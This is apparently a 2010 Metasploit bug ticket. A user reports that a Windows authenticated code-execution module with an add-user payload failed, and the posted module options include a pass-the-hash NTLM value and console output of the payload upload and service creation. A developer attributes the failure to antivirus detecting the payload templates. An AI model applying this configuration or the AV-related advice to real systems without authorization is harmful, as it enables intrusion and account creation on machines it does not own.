Bug #2474
Microsoft Windows Authenticated User Code Execution with Windows Add User Payload
| Status: | Closed | Start date: | 09/01/2010 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | Joshua J. Drake | % Done: | 0% |
|
| Category: | payloads | |||
| Target version: | Metasploit 3.5.0 | |||
| Resolution: | invalid | Release Note: |
Description
Hi,
I was trying the above exploit using a NTLM hash to exploit and then deploying windows adduser payload
Connection (445) was established between the attacking machine and the target machine.
However, the account was not created on the target machine. Is this exploit limited to the kinds of payload we can deploy?
Note: I have physical access to both machine, and on the targetted machine, the account was not created although a 445 session was established between the attacking and target machine.
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.10.10.10 yes The target address RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass 00000000000000000000000000000000:E3D386D6673369E87139D020D653218E no The password for the specified username SMBUser Administrator no The username to authenticate as Payload options (windows/adduser): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process PASS test123 yes The password for this user USER test123 yes The username to create [*] Connecting to the server... [*] Authenticating as user 'ADministrator'... [*] Uploading payload... [*] Created \DkysLinS.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (hjTkQCQp - "MrsMgvquMqVIwuWWTZLIAlXkQPCB")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \DkysLinS.exe... [*] Exploit completed, but no session was created.
Related issues
History
Updated by john grisham over 1 year ago
Revision r10155
Updated by Joshua J. Drake over 1 year ago
- Category set to payloads
- Status changed from New to Assigned
- Assignee set to Joshua J. Drake
- Target version set to Metasploit 3.5.0
John, is the targeted machine running anti-virus?
Updated by john grisham over 1 year ago
Yes it is, Panda AV
Updated by Joshua J. Drake over 1 year ago
You should check your AV logs if possible. Perhaps trying with the AV uninstalled or disabled might yield better results.
Updated by Joshua J. Drake over 1 year ago
To clarify, it is a known issue that the service template exe (and various other template exes) are detected by various antivirus products. I think this may be what you're running into.
Updated by john grisham over 1 year ago
but it's strange when i use ms0867 as an exploit and the payload as windows add user in the same environment it can work. is this usual?
Updated by Joshua J. Drake over 1 year ago
Yes. Regular exploits for memory corruption issues do not use the EXE templates, and thus are not affected by the AV signatures that are catching them.
Updated by Joshua J. Drake over 1 year ago
- Status changed from Assigned to Closed
- Resolution set to invalid
I'm closing this assuming that AV was your issue.
Updated by john grisham over 1 year ago
i will chk and get back to u.
thanks!